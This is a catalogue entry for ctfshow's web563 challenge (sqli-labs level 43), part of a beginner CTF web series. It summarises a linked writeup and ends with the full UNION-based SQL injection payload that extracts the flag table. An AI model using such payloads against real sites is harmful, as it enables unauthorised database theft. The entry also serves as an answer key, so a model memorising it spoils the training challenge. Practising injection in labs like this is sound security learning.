web563
| ID: | 4045 |
|---|---|
| 标题: | web563 |
| 描述: | * 此题为 【从0开始学web】系列第五百六十三题 * 此系列题目从最基础开始,题目遵循循序渐进的原则 * 希望对学习CTF WEB的同学有所帮助。 > 如果你已经做到这里,下面就可以轻松AK sqli-labs了 |
| 类型: | WEB入门.sqli-labs |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/1256 |
| 赛事: | sqli-labs |
| 年度: | None |
| Flag值: | 无 |
| writeup: |
https://blog.csdn.net/Jayjay___/article/details/132081414 (根据网页2内容,Sqli-labs 43关(web563)的解题步骤为:闭合方式使用'),通过联合注入获取数据库名、表名、列名及数据,最终payload为?id=1') and 1=2 union select 1,2,group_concat(flagaca) from ctfshow.flagaanec--+。该CSDN博客详细记录了完整解题过程,可验证答案真实性) 2 |